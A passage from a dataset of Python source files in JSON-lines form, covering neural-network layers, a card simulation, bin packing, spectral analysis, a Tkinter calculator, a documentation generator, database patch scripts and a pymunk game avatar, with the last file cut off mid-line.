skip\n\n\nclass LinearNorm(nn.Module):\n \"\"\" LinearNorm Projection \"\"\"\n\n def __init__(self, in_features, out_features, bias=False):\n super(LinearNorm, self).__init__()\n self.linear = nn.Linear(in_features, out_features, bias)\n\n nn.init.xavier_uniform_(self.linear.weight)\n if bias:\n nn.init.constant_(self.linear.bias, 0.0)\n \n def forward(self, x):\n x = self.linear(x)\n return x\n\n\nclass ConvBlock(nn.Module):\n \"\"\" Convolutional Block \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, dropout, activation=nn.ReLU()):\n super(ConvBlock, self).__init__()\n\n self.conv_layer = nn.Sequential(\n ConvNorm(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n stride=1,\n padding=int((kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"tanh\",\n ),\n nn.BatchNorm1d(out_channels),\n activation\n )\n self.dropout = dropout\n self.layer_norm = nn.LayerNorm(out_channels)\n\n def forward(self, enc_input, mask=None):\n enc_output = enc_input.contiguous().transpose(1, 2)\n enc_output = F.dropout(self.conv_layer(enc_output), self.dropout, self.training)\n\n enc_output = self.layer_norm(enc_output.contiguous().transpose(1, 2))\n if mask is not None:\n enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0)\n\n return enc_output\n\n\nclass ConvNorm(nn.Module):\n \"\"\" 1D Convolution \"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size=1,\n stride=1,\n padding=None,\n dilation=1,\n bias=True,\n w_init_gain=\"linear\",\n ):\n super(ConvNorm, self).__init__()\n\n if padding is None:\n assert kernel_size % 2 == 1\n padding = int(dilation * (kernel_size - 1) / 2)\n\n self.conv = nn.Conv1d(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n bias=bias,\n )\n nn.init.kaiming_normal_(self.conv.weight)\n\n def forward(self, signal):\n conv_signal = self.conv(signal)\n\n return conv_signal\n\n\nclass FFTBlock(nn.Module):\n \"\"\" FFT Block \"\"\"\n\n def __init__(self, d_model, n_head, d_k, d_v, d_inner, kernel_size, dropout=0.1):\n super(FFTBlock, self).__init__()\n self.slf_attn = MultiHeadAttention(n_head, d_model, d_k, d_v, dropout=dropout)\n self.pos_ffn = PositionwiseFeedForward(\n d_model, d_inner, kernel_size, dropout=dropout\n )\n\n def forward(self, enc_input, mask=None, slf_attn_mask=None):\n enc_output, enc_slf_attn = self.slf_attn(\n enc_input, enc_input, enc_input, mask=slf_attn_mask\n )\n if mask is not None:\n enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0)\n\n enc_output = self.pos_ffn(enc_output)\n if mask is not None:\n enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0)\n\n return enc_output, enc_slf_attn\n\n\nclass MultiHeadAttention(nn.Module):\n \"\"\" Multi-Head Attention \"\"\"\n\n def __init__(self, n_head, d_model, d_k, d_v, dropout=0.1):\n super(MultiHeadAttention, self).__init__()\n\n self.n_head = n_head\n self.d_k = d_k\n self.d_v = d_v\n\n self.w_qs = LinearNorm(d_model, n_head * d_k)\n self.w_ks = LinearNorm(d_model, n_head * d_k)\n self.w_vs = LinearNorm(d_model, n_head * d_v)\n\n self.attention = ScaledDotProductAttention(temperature=np.power(d_k, 0.5))\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.fc = LinearNorm(n_head * d_v, d_model)\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, q, k, v, mask=None):\n\n d_k, d_v, n_head = self.d_k, self.d_v, self.n_head\n\n sz_b, len_q, _ = q.size()\n sz_b, len_k, _ = k.size()\n sz_b, len_v, _ = v.size()\n\n residual = q\n\n q = self.w_qs(q).view(sz_b, len_q, n_head, d_k)\n k = self.w_ks(k).view(sz_b, len_k, n_head, d_k)\n v = self.w_vs(v).view(sz_b, len_v, n_head, d_v)\n q = q.permute(2, 0, 1, 3).contiguous().view(-1, len_q, d_k) # (n*b) x lq x dk\n k = k.permute(2, 0, 1, 3).contiguous().view(-1, len_k, d_k) # (n*b) x lk x dk\n v = v.permute(2, 0, 1, 3).contiguous().view(-1, len_v, d_v) # (n*b) x lv x dv\n\n mask = mask.repeat(n_head, 1, 1) # (n*b) x .. x ..\n output, attn = self.attention(q, k, v, mask=mask)\n\n output = output.view(n_head, sz_b, len_q, d_v)\n output = (\n output.permute(1, 2, 0, 3).contiguous().view(sz_b, len_q, -1)\n ) # b x lq x (n*dv)\n\n output = self.dropout(self.fc(output))\n output = self.layer_norm(output + residual)\n\n return output, attn\n\n\nclass ScaledDotProductAttention(nn.Module):\n \"\"\" Scaled Dot-Product Attention \"\"\"\n\n def __init__(self, temperature):\n super(ScaledDotProductAttention, self).__init__()\n self.temperature = temperature\n self.softmax = nn.Softmax(dim=2)\n\n def forward(self, q, k, v, mask=None):\n\n attn = torch.bmm(q, k.transpose(1, 2))\n attn = attn / self.temperature\n\n if mask is not None:\n attn = attn.masked_fill(mask, -np.inf)\n\n attn = self.softmax(attn)\n output = torch.bmm(attn, v)\n\n return output, attn\n\n\nclass PositionwiseFeedForward(nn.Module):\n \"\"\" A two-feed-forward-layer \"\"\"\n\n def __init__(self, d_in, d_hid, kernel_size, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n\n # Use Conv1D\n # position-wise\n self.w_1 = nn.Conv1d(\n d_in,\n d_hid,\n kernel_size=kernel_size[0],\n padding=(kernel_size[0] - 1) // 2,\n )\n # position-wise\n self.w_2 = nn.Conv1d(\n d_hid,\n d_in,\n kernel_size=kernel_size[1],\n padding=(kernel_size[1] - 1) // 2,\n )\n\n self.layer_norm = nn.LayerNorm(d_in)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n residual = x\n output = x.transpose(1, 2)\n output = self.w_2(F.relu(self.w_1(output)))\n output = output.transpose(1, 2)\n output = self.dropout(output)\n output = self.layer_norm(output + residual)\n\n return output\n","sub_path":"model/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":8465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610106802","text":"import numpy as np\nimport random\n\nkarten = np.random.randint(1, 5, size=100000)\n\nclass zufall_ohne:\n def __init__(self):\n self.zufall = [1,2,3,4]\n \n def ziehen_ohne(self):\n entfernt = random.choice(self.zufall)\n self.zufall.remove(entfernt)\n return (entfernt)\n\neinzel = False\nstatistik = {'erster':0, 'zweiter':0, 'dritter':0 ,'vierter':0}\nspielrunden = 0\nfor i in karten:\n spieler = zufall_ohne()\n if einzel: \n print(\"Schwarze Position: \" + str(i))\n erster = spieler.ziehen_ohne()\n if einzel: \n print(\" Erster zieht Karte \" + str(erster))\n if i == erster:\n statistik['erster'] += 1\n spielrunden += 1\n else:\n zweiter = spieler.ziehen_ohne()\n if einzel: \n print(\" Zweiter zieht Karte \" + str(zweiter))\n if i == zweiter:\n statistik['zweiter'] += 1\n spielrunden += 2\n else:\n dritter = spieler.ziehen_ohne()\n if einzel: \n print(\" Dritter zieht Karte \" + str(dritter))\n if i == dritter:\n statistik['dritter'] += 1\n spielrunden += 3\n else:\n vierter = spieler.ziehen_ohne()\n if einzel: \n print(\" Vierter zieht Karte \" + str(vierter))\n if i == vierter:\n statistik['vierter'] += 1\n spielrunden += 4\n if einzel:\n for (key, value) in statistik.items():\n print(' '*6 + key + ': ' + str(value))\n\nfor (key, value) in statistik.items():\n print(key + ': ' + str(round(value/ len(karten),2)* 100) + '%') \n \n\n","sub_path":"Kartenziehen.py","file_name":"Kartenziehen.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"163959784","text":"\"\"\"\nBin Packing Problem (Minimize number of used Bins)\nGiven n items of different weights and bins each of capacity c,\nassign each item to a bin such that number of total used bins is minimized.\nIt may be assumed that all items have weights smaller than bin capacity.\n\nInput: wieght[] = {4, 8, 1, 4, 2, 1}\n Bin Capacity c = 10\nOutput: 2\nWe need minimum 2 bins to accommodate all items\nFirst bin contains {4, 4, 2} and second bin {8, 2}\n\nInput: wieght[] = {9, 8, 2, 2, 5, 4}\n Bin Capacity c = 10\nOutput: 4\nWe need minimum 4 bins to accommodate all items.\n\nInput: wieght[] = {2, 5, 4, 7, 1, 3, 8};\n Bin Capacity c = 10\nOutput: 3\n\nLower Bound\nWe can always find a lower bound on minimum number of bins required. The lower bound can be given as :\n\n Min no. of bins >= Ceil ((Total Weight) / (Bin Capacity))\n\nIn the above examples, lower bound for first example is “ceil(4 + 8 + 1 + 4 + 2 + 1)/10” = 2 and lower bound in second example is “ceil(9 + 8 + 2 + 2 + 5 + 4)/10” = 3.\nThis problem is a NP Hard problem and finding an exact minimum number of bins takes exponential time. Following are approximate algorithms for this problem.\n\nApplications\n\nLoading of containers like trucks.\nPlacing data on multiple disks.\nJob scheduling.\nPacking advertisements in fixed length radio/TV station breaks.\nStoring a large collection of music onto tapes/CD’s, etc.\n\n\"\"\"\n\n\nclass Solution:\n def nextfit(self, weight, c):\n res = 0\n rem = c\n for _ in range(len(weight)):\n if rem >= weight[_]:\n rem = rem - weight[_]\n else:\n res += 1\n rem = c - weight[_]\n return res\n\n def firstFit(self, weight, n, c):\n\n # Initialize result (Count of bins)\n res = 0\n\n # Create an array to store remaining space in bins\n # there can be at most n bins\n bin_rem = [0] * n\n\n # Place items one by one\n for i in range(n):\n\n # Find the first bin that can accommodate\n # weight[i]\n j = 0\n\n # Initialize minimum space left and index\n # of best bin\n min = c + 1\n bi = 0\n\n for j in range(res):\n if bin_rem[j] >= weight[i] and bin_rem[j] - weight[i] < min:\n bi = j\n min = bin_rem[j] - weight[i]\n\n # If no bin could accommodate weight[i],\n # create a new bin\n if min == c + 1:\n bin_rem[res] = c - weight[i]\n res += 1\n else: # Assign the item to best bin\n bin_rem[bi] -= weight[i]\n return res\n\n # Driver Code\n\n\nweight = [2, 5, 4, 7, 1, 3, 8]\nc = 10\nn = len(weight)\nsolution = Solution()\nprint(\"Number of bins required in Next Fit :\", solution.nextfit(weight, c))\nprint(\"Number of bins required in Next Fit :\", solution.firstFit(weight, n, c))\n","sub_path":"src/arrays/binPack.py","file_name":"binPack.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421378083","text":"# coding=utf-8\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plot_spectrograph(omega_vector, k, plottable_space_time_fft, maximal_omega, title=None):\n fig, ax = plt.subplots()\n OMEGA, K = np.meshgrid(omega_vector, k, indexing='ij')\n CF = ax.contourf(OMEGA, K, plottable_space_time_fft, 500)\n plt.colorbar(CF)\n ax.plot(maximal_omega, k, \"ro-\")\n ax.set_xlabel(\"omega\")\n ax.set_ylabel(\"k\")\n ax.grid()\n if title:\n ax.set_title(title)\n return fig\n\n\ndef plot_dispersion_relation(k, maximal_omega, title=None):\n fig, ax = plt.subplots()\n\n ax.plot(k, maximal_omega)\n ax.set_xlabel(\"k\")\n ax.set_ylabel(\"omega\")\n ax.grid()\n if title:\n ax.set_title(title)\n return fig\n\n\ndef dispersion_relation(t, x, z, plot_spectro=False, plot_dispersion=False, title=None):\n # omega od k\n # dla każdego k\n # przejrzeć wszystkie omegi na osi 0\n # wybrać taką która ma maksymalną składową\n # plotnąć ją dla tego k\n dt = t[1] - t[0]\n dx = x[1] - x[0]\n phase_resolution = np.pi * 2\n k = (np.fft.rfftfreq(x.size, dx)) * 2 * phase_resolution\n omega_vector = (np.fft.rfftfreq(t.size, dt)) * phase_resolution\n\n space_time_fft = np.fft.rfft(np.fft.rfft(z, axis=1), axis=0)\n plottable_space_time_fft = np.log(np.abs(space_time_fft).real)\n\n \"\"\"\n signals are:\n in rows numbered by k_indices\n IF\n \"\"\"\n noise_indices = plottable_space_time_fft < -3\n analysis_space_time_fft = plottable_space_time_fft.copy()\n analysis_space_time_fft[noise_indices] = -3\n maximal_omega_index = np.argmax(analysis_space_time_fft, axis=0)\n maximal_omega = omega_vector[maximal_omega_index]\n\n if plot_spectro and plot_dispersion:\n return plot_spectrograph(omega_vector, k, plottable_space_time_fft, maximal_omega,\n title), plot_dispersion_relation(k, maximal_omega, title)\n\n if plot_dispersion:\n return plot_dispersion_relation(k, maximal_omega, title)\n if plot_spectro:\n return plot_spectrograph(omega_vector, k, plottable_space_time_fft, maximal_omega, title)\n return k, maximal_omega\n\n\ndef test_spectrograph():\n tmax = 1\n xmax = 12\n t = np.linspace(0, tmax, 128, endpoint=False)\n x = np.linspace(0, xmax, 128, endpoint=False)\n\n T, X = np.meshgrid(t, x, indexing='ij')\n wavevector = 6 * np.pi\n omega = 10 * np.pi\n z = 5 * np.cos(wavevector * X - omega * T) + \\\n 10 * np.sin(8 * np.pi * X - omega * T)\n\n result_k, result_omega = dispersion_relation(t, x, z, plot_spectro=True, plot_dispersion=True)\n assert (np.logical_or(np.isclose(result_omega, omega, rtol=1e-3),\n np.isclose(result_omega, 0))).all(), (result_omega, omega)\n\n\ndef spectral_analysis(S, filename):\n t = np.arange(S.NT + 1) * S.dt\n dispersion_relation(t, S.grid.x, S.grid.charge_density_history, plot_spectro=True, plot_dispersion=False,\n title=filename + \"\\nCharge density\")\n dispersion_relation(t, S.grid.x, S.grid.electric_field_history, plot_spectro=True, plot_dispersion=False,\n title=filename + \"\\nElectric field\")\n\n\nif __name__ == '__main__':\n import Simulation\n\n for i in range(1, 11):\n filename = \"data_analysis/TS{}.hdf5\".format(i)\n spectral_analysis(Simulation.load_data(filename), filename)\n plt.show()\n","sub_path":"spectrograph.py","file_name":"spectrograph.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137522721","text":"#%%\nimport pymssql #引入pymssql模块\nimport numpy as np\nimport pandas as pd\n\nconn = pymssql.connect('127.0.0.1', None, None, 'dtest')\nwith conn.cursor(as_dict=False) as cursor:\n sql = 'select title_word_seq from t_question where title_word_seq <> \\'-1\\''\n cursor.execute(sql)\n titles = cursor.fetchall()\n#%%\ntitles_vectors = []\ncount = 0\nfor title in titles:\n vectors = []\n words = title[0].split(',')\n for word in words:\n with conn.cursor() as cursor:\n sql = 'select vectors from t_word where id = \\'{}\\''.format(word)\n cursor.execute(sql)\n vectors.append(np.array(cursor.fetchone()[0].split(' ')).astype(np.float16))\n titles_vectors.append(np.array(vectors))\n\n count += 1\n if count%2000 == 0:\n print(\"{}/{}\".format(count, len(titles)))\n\ndel titles\nnp.save('./title_word.npy', titles_vectors)","sub_path":"project/question_embed/title_RD.py","file_name":"title_RD.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26123954","text":"from tkinter import Tk\nfrom tkinter import StringVar,Entry,Button\nimport math\n\nclass calculator:\n def __init__(self):\n window=Tk()\n window.title('基于TK的科学计算器')\n window.configure(background=\"white\")\n self.string=StringVar()\n entry=Entry(window,textvariable=self.string,)\n entry.grid(row=0,column=0,columnspan=6)\n entry.configure(background=\"white\")\n entry.focus()\n \n values=[\"C\",\"DEL\",\"(\",\")\",\"%\",\"gcd\",\n \"sin\",\"sqrt\",\"e\",\"pow\",\"/\",\"radians\",\n \"cos\",\"7\",\"8\",\"9\",\"*\",\"degrees\",\n \"tan\",\"4\",\"5\",\"6\",\"-\",\"ceil\",\n \"pi\",\"1\",\"2\",\"3\",\"+\",\"hypot\",\n \"log\",\",\",\"0\",\".\",\"=\"]\n \n text=1\n i=0\n row=1\n col=0\n for txt in values:\n padx=10\n pady=10\n if(i==6):\n row=2\n col=0\n if(i==12):\n row=3\n col=0\n if(i==18):\n row=4\n col=0\n if(i==24):\n row=5\n col=0\n if(i==30):\n row=6\n col=0\n if(txt=='='):\n btn=Button(window,height=2,width=4,padx=50,pady=pady,text=txt,command=lambda txt=txt:self.equals())\n btn.grid(row=row,column=col,columnspan=3,padx=2,pady=2)\n btn.configure(background=\"yellow\")\n\n elif(txt=='DEL'):\n btn=Button(window,height=2,width=4,padx=padx,pady=pady, text=txt ,command=lambda txt=txt:self.delete())\n btn.grid(row=row,column=col,padx=1,pady=1)\n btn.configure(background=\"grey\")\n elif(txt=='C'):\n btn=Button(window,height=2,width=4,padx=padx,pady=pady,text=txt,command=lambda txt=txt:self.clearall())\n btn.grid(row=row,column=col,padx=1,pady=1)\n btn.configure(background=\"red\")\n else:\n btn=Button(window,height=2,width=4,padx=padx,pady=pady,text=txt ,command=lambda txt=txt:self.addChar(txt))\n btn.grid(row=row,column=col,padx=1,pady=1)\n btn.configure(background=\"white\")\n\n col=col+1\n i=i+1\n window.mainloop()\n \n\n def clearall(self):\n self.string.set(\"\")\n\n def equals(self):\n result=\"\"\n\n try:\n result=eval(self.string.get())\n self.string.set(result)\n except:\n result=\"无效输入\"\n self.string.set(result)\n \n def addChar(self,char):\n i = ['log','sqrt','pi','sin','cos','tan','e',\"gcd\",\"radians\",\"degrees\",\"ceil\",\"hypot\"]\n if char in i:\n self.string.set(self.string.get()+'math.'+(str(char)))\n else:\n self.string.set(self.string.get()+(str(char)))\n \n def delete(self):\n self.string.set(self.string.get()[0:-1])\n \ncalculator()\n","sub_path":"Scientific_Calculator.py","file_name":"Scientific_Calculator.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"5596185","text":"\"\"\"为项目创建文档.\"\"\"\nimport json\nimport subprocess\nfrom string import Template\nfrom typing import Dict, Any\nfrom pmfp.const import (\n DOC_PATH,\n PROJECT_HOME,\n PMFP_DOC_TEMP,\n JS_ENV_PATH\n)\nimport chardet\nfrom .utils import new_json_package\n\n\ndef js_document(config: Dict[str, Any]):\n \"\"\"为js创建文档.\n\n Args:\n config (Dict[str, Any]): 项目配置.\n \"\"\"\n new_json_package(config)\n command = \"npm install --save-dev esdoc\"\n res = subprocess.run(command, capture_output=True, shell=True)\n if res.returncode != 0:\n print(f\"安装开发js文档所需依赖esdoc出错\")\n encoding = chardet.detect(res.stderr).get(\"encoding\")\n print(res.stderr.decode(encoding))\n else:\n command = \"npm install --save-dev esdoc-publish-markdown-plugin\"\n if res.returncode != 0:\n print(f\"安装开发js文档所需依赖esdoc-publish-markdown-plugin出错\")\n encoding = chardet.detect(res.stderr).get(\"encoding\")\n print(res.stderr.decode(encoding))\n else:\n docs = PROJECT_HOME.joinpath(\"docs\")\n if not docs.exists():\n docs.mkdir(parents=True, exist_ok=False)\n with open(str(JS_ENV_PATH), encoding=\"utf-8\") as f:\n content = json.load(f)\n with open(str(JS_ENV_PATH), \"w\", encoding=\"utf-8\") as f:\n content.update({\n \"esdoc\": {\n \"destination\": \"./docs\",\n \"source\": \"./es\",\n \"includes\": [r\"\\\\.js$\"],\n \"excludes\": [r\"\\\\.config\\\\.js$\"],\n \"plugins\": [\n {\n \"name\": \"esdoc-standard-plugin\"\n }\n ]\n },\n })\n json.dump(content, f)\n\n\ndef default_document(config: Dict[str, Any], language: str) -> bool:\n \"\"\"默认的文档.\n\n 默认使用sphinx创建文档.至少python用这个.\n\n Args:\n config (Dict[str, Any]): 项目配置.\n language (str): 项目的编程语言.\n\n Returns:\n bool: 创建成功返回True\n\n \"\"\"\n if DOC_PATH.exists():\n print(\"document文件夹已存在\")\n return False\n else:\n package_path = PROJECT_HOME.joinpath(config[\"project-name\"])\n project_name = config[\"project-name\"]\n author = config[\"author\"]\n version = config[\"version\"]\n if package_path.exists():\n command = f\"sphinx-apidoc -F -H {project_name} -A {author} -V {version} -a -o document {project_name}\"\n else:\n command = f\"sphinx-apidoc -F -H {project_name} -A {author} -V {version} -a -o document .\"\n res = subprocess.run(command, capture_output=True, shell=True)\n if res.returncode != 0:\n print(f\"生成api文档失败\")\n encoding = chardet.detect(res.stderr).get(\"encoding\")\n print(res.stderr.decode(encoding))\n else:\n doc_conf = PMFP_DOC_TEMP.joinpath(language).open(encoding=\"utf-8\").read()\n #doc_conf_temp = Template(doc_conf)\n with open(\"document/conf.py\", \"w\", encoding=\"utf-8\") as f:\n f.write(doc_conf)\n print('完成初始化文档源文件')\n print(\"编译项目文档\")\n command = \"sphinx-build -b html document docs\"\n res = subprocess.run(command, capture_output=True, shell=True)\n if res.returncode != 0:\n print(f\"编译项目文档失败\")\n encoding = chardet.detect(res.stderr).get(\"encoding\")\n print(res.stderr.decode(encoding))\n else:\n docs = PROJECT_HOME.joinpath(\"docs\")\n nojekyll = docs.joinpath(\".nojekyll\")\n if not nojekyll.exists():\n with nojekyll.open(\"w\", encoding=\"utf-8\") as f:\n pass\n print(\"编译项目文档完成!\")\n print(\"初始化项目文档国际化部分\")\n command = \"sphinx-build -b gettext document docs/locale\"\n res = subprocess.run(command, capture_output=True, shell=True)\n if res.returncode != 0:\n print(f\"构造待翻译文件失败\")\n encoding = chardet.detect(res.stderr).get(\"encoding\")\n print(res.stderr.decode(encoding))\n else:\n command = \"sphinx-intl update -p docs/locale -d document/locale -l zh -l en\"\n res = subprocess.run(command, capture_output=True, shell=True)\n if res.returncode != 0:\n print(f\"更新待翻译文件失败\")\n encoding = chardet.detect(res.stderr).get(\"encoding\")\n print(res.stderr.decode(encoding))\n else:\n print(\"初始化项目文档国际化部分 完成!\")\n print('创建项目文档完成')\n return True\n\n\ndef new_document(config: Dict[str, Any], language: str):\n \"\"\"初始化sphinx文档.\n\n Args:\n config (Dict[str, Any]): 项目配置.\n language (str): 项目的编程语言.\n \"\"\"\n print('创建项目文档')\n if language == \"javascript\":\n js_document(config)\n else:\n default_document(config, language)\n","sub_path":"pmfp/new/_new_doc.py","file_name":"_new_doc.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"545885629","text":"# -*- coding: utf-8 -*-\nimport os, sys\nimport datetime\nfrom bson import ObjectId\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../util'))\nimport loghelper, db\n\n#logger\nloghelper.init_logger(\"patch_funding_companyid\", stream=True)\nlogger = loghelper.get_logger(\"patch_funding_companyid\")\n\n'''\nselect distinct corporateId from funding where (active is null or active='Y') and \ncorporateId in ( select corporateId from (select corporateId, count(*) cnt from company where active is null or active='Y' group by corporateId having cnt>1) a);\n'''\n\nconn = db.connect_torndb()\nmongo = db.connect_mongo()\n\ndef get_company_ids(corporate_id):\n company_ids = []\n items = conn.query(\"select id from company where corporateId=%s\", corporate_id)\n for item in items:\n company_ids.append(item[\"id\"])\n return company_ids\n\n\ndef guess_company_id(funding):\n items = conn.query(\"select id from company where (active is null or active='Y') and corporateId=%s order by id\",\n funding[\"corporateId\"])\n if len(items) == 0:\n items = conn.query(\"select id from company where (active is null or active!='N') and corporateId=%s order by id\",\n funding[\"corporateId\"])\n\n if len(items) == 0:\n items = conn.query(\"select id from company where corporateId=%s order by id\",\n funding[\"corporateId\"])\n\n if len(items) == 1:\n return items[0][\"id\"]\n\n news_id = funding[\"newsId\"]\n company_id = guess_by_news(news_id, items)\n if company_id is not None:\n return company_id\n\n logger.info(\"get the first one! fundingId=%s, corporateId=%s\", funding[\"id\"], funding[\"corporateId\"])\n return items[0][\"id\"]\n\n\ndef guess_by_news(news_id,items):\n if news_id is None or news_id.strip()==\"\":\n return None\n news = mongo.article.news.find_one({\"_id\": ObjectId(news_id)})\n if news is None:\n return None\n\n guess_company_ids = []\n company_ids = []\n for item in items:\n company_ids.append(item[\"id\"])\n\n news_company_ids = news[\"companyIds\"]\n for company_id in news_company_ids:\n if company_id in company_ids:\n guess_company_ids.append(company_id)\n if len(guess_company_ids) == 0:\n return None\n elif len(guess_company_ids) == 1:\n return guess_company_ids[0]\n else:\n logger.info(\"more than one company attached with the news %s\", news_id)\n return None\n\n\ndef main():\n no_company_funding_cnt = 0\n # fundings = conn.query(\"select * from funding where (active is null or active='Y' or active='P') and companyId is null order by id desc\")\n fundings = conn.query(\"select * from funding where companyId is null order by id desc\")\n for funding in fundings:\n corporate_id = funding[\"corporateId\"]\n company_ids = get_company_ids(corporate_id)\n if len(company_ids) == 0:\n logger.info(\"no company! fundingId=%s, corporateId=%s\", funding[\"id\"], corporate_id)\n no_company_funding_cnt += 1\n continue\n elif len(company_ids) == 1:\n company_id = company_ids[0]\n else:\n company_id = guess_company_id(funding)\n\n conn.update(\"update funding set companyId=%s where id=%s\", company_id, funding[\"id\"])\n\n logger.info(\"no_company_funding_cnt=%s\", no_company_funding_cnt)\n\n\ndef verify():\n fundings = conn.query(\"select * from funding where active is null or active !='N' order by id desc\")\n for funding in fundings:\n company_id = funding[\"companyId\"]\n corporate_id = funding[\"corporateId\"]\n if company_id is None:\n logger.info(\"companyId is None. fundingId=%s\", funding[\"id\"])\n continue\n company = conn.get(\"select * from company where id=%s\", company_id)\n if company is None:\n logger.info(\"company not exist. fundingId=%s\", funding[\"id\"])\n continue\n if company[\"corporateId\"] != corporate_id:\n logger.info(\"company corporate not the same. fundingId=%s\", funding[\"id\"])\n\n\nif __name__ == \"__main__\":\n main()\n # verify()","sub_path":"data/patch/patch_funding_companyid.py","file_name":"patch_funding_companyid.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178652934","text":"# http://stackoverflow.com/questions/26282338/parse-maillog-in-python\nimport re, sys\n\nlines = []\nqueue_id = []\nf_h = open('maillog', 'r')\n\ndef Find_Email(pattern,text):\n email = re.search(pattern, text)\n if email:\n lines.append(text)\n q_id = re.search('[A-F0-9]{10}', text)\n print(text)\n if q_id:\n queue_id.append(q_id.group())\n\n\nfor line in f_h:\n Find_Email(r'recipient@gmil.com',line)","sub_path":"L00.Test/parser_postfix_log.py","file_name":"parser_postfix_log.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45729234","text":"'''\n\n'''\n\nimport math\nimport pyglet\nfrom pyglet import *\nfrom pyglet.window import key\nimport pymunk\nfrom pymunk.vec2d import Vec2d\nimport py2d\nfrom py2d.director import Director\nfrom py2d import actor\nfrom py2d import keyboard\n\ndx = 150\n\nplatform_collType = 1\n\nPLAYER_VELOCITY = 200.\nPLAYER_GROUND_ACCEL_TIME = 0.05\nPLAYER_GROUND_ACCEL = (PLAYER_VELOCITY / PLAYER_GROUND_ACCEL_TIME)\n\nPLAYER_AIR_ACCEL_TIME = 0.05\nPLAYER_AIR_ACCEL = (PLAYER_VELOCITY/PLAYER_AIR_ACCEL_TIME)\n\nJUMP_HEIGHT = 48\nJUMP_BOOST_HEIGHT = 24.\nJUMP_CUTOFF_VELOCITY = 100\nFALL_VELOCITY = 500.\nJUMP_LENIENCY = 0.05\nHEAD_FRICTION = 0.7\n\nJUMP_TIMES = 2\n\n\nclass Avatar(py2d.actor.PhysicalActor):\n\tkeyboard = keyboard.Keyboard()\n\tremaining_jumps = 0\n\t\n\n\tdef __init__(self, window, batch=None):\n\t\tanim = self.loadAnimation(\"zombieright.png\", 1, 4, 0.1, True, True)\n\t\tsuper(Avatar, self).__init__(anim, batch)\n\t\twindow.push_handlers(self.keyboard)\n\t\tself.keyboard.keyPressHandler = self.keyRelease\n\t\tself.initPhysics()\n\t\t#self.landing = {'p':Vec2d.zero(), 'n':0}\n\t\tself.landed_previous = False\n\t\tself.jumpTrigger = False\n\t\t\n\tdef initPhysics(self):\n\t\tself.feet = pymunk.Circle(self.body, 20, (0,0))\n\t\tself.mid = pymunk.Circle(self.body, 20, (0,40))\n\t\tself.head = pymunk.Circle(self.body, 20, (0,75))\n\t\tself.feet.collisionType = platform_collType\n\t\tself.feet.elasticity = 1.\n\t\t\n\t\tself.platformNormal = Vec2d.zero()\n\t\tself.platformBody = None\n\t\t\n\t\tself.slide = False\n\n\tdef addedToScene(self, scene):\n\t\tsuper(Avatar, self).addedToScene(scene)\n\t\tscene.space.add(self.feet)\n\t\tscene.space.add(self.mid)\n\t\tscene.space.add(self.head)\n\n\tdef keyRelease(self, symbol, modifier):\n\t\tif symbol == key.M:\n\t\t\tself.body.angle += math.radians(40)\n\t\t\n\t\tif symbol == key.UP:\n\t\t\tself.jumpTrigger = True\n\n\tdef set_position(self,x,y):\n\t\tself.body.position = x,y\n\t\tsuper(Avatar, self).set_position(x,y)\n\n\n\tdef update(self, dt):\n\t\tdef f(arbiter):\n\t\t\tn = -arbiter.contacts[0].normal\n\t\t\tif n.y > 0.0:\n\t\t\t\tself.platformNormal = n\n\t\t\t\tself.platformBody = arbiter.shapes[1].body\n\t\t\n\t\tself.platformNormal = Vec2d.zero()\n\t\tself.platformBody = None\n\t\tself.body.each_arbiter(f)\n\t\t\n\t\t# if ground body is found and slope induced grounding normal is lower than feet friction\n\t\t# (find out if grounded)\n\t\tgrounded = False\n\t\tground_velocity = Vec2d.zero()\n\t\tif self.platformBody != None and abs(self.platformNormal.x / self.platformNormal.y) < self.feet.friction:\n\t\t\tgrounded = True\n\t\t\tself.remaining_jumps = JUMP_TIMES\n\t\t\tground_velocity = self.platformBody.velocity\n\t\t\t\n\t\t# control inputs\n\t\ttargetXVel = 0\n\t\tif self.keyboard[key.LEFT]:\n\t\t\ttargetXVel -= PLAYER_VELOCITY\n\t\tif self.keyboard[key.RIGHT]:\n\t\t\ttargetXVel += PLAYER_VELOCITY\n\t\tif self.keyboard[key.DOWN]:\n\t\t\tself.slide = True\n\t\telse:\n\t\t\tself.slide = False\n\t\tif self.jumpTrigger == True:\n\t\t\tself.jumpTrigger = False\n\t\t\tif grounded or 